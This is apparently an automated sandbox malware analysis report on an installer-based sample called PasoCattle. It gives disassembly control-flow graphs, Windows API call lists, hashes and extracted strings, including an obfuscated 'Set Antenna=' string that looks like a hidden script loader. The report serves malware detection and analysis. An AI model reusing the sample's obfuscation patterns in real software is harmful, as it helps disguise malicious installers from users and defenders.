                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                      • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                      • API String ID: 2872004960-3619442763
                                                                                                                                                                      • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                      • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                      • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                      • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                      • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                      • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                      • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                      • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3282139019-0
                                                                                                                                                                      • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                      • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                      • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                      • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                        • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                        • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                      • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                      • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                      • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                      • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                      • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                        • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                      • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                      • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                      • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                      • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                      • API String ID: 608394941-2746725676
                                                                                                                                                                      • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                      • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                      • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                      • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                      • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                                                                                                                                                      • API String ID: 4286501637-2478300759
                                                                                                                                                                      • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                      • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                      • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                      • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                        • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                        • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                      Strings
                                                                                                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                      • Error launching installer, xrefs: 00403603
                                                                                                                                                                      • soft, xrefs: 004036A1
                                                                                                                                                                      • Null, xrefs: 004036AA
                                                                                                                                                                      • Inst, xrefs: 00403698
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                      • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                      • API String ID: 4283519449-527102705
                                                                                                                                                                      • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                      • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                      • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                      • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                      • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,0042A4AD,00403792,00000000), ref: 004034FF
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                      Strings
                                                                                                                                                                      • ... %d%%, xrefs: 004034C8
                                                                                                                                                                      • pAB, xrefs: 004033AB
                                                                                                                                                                      • Set Antenna=LJNgTransport-Mail-Angola-Both-Directory-klFlesh-Holders-Mx-Hugo-Guards-ZhQThread-Say-Injury-Davis-Honda-SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-DiFSlot-Fucked-Rf-Shipping-Indianapolis-mylSunset-Educators-, xrefs: 004033FD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
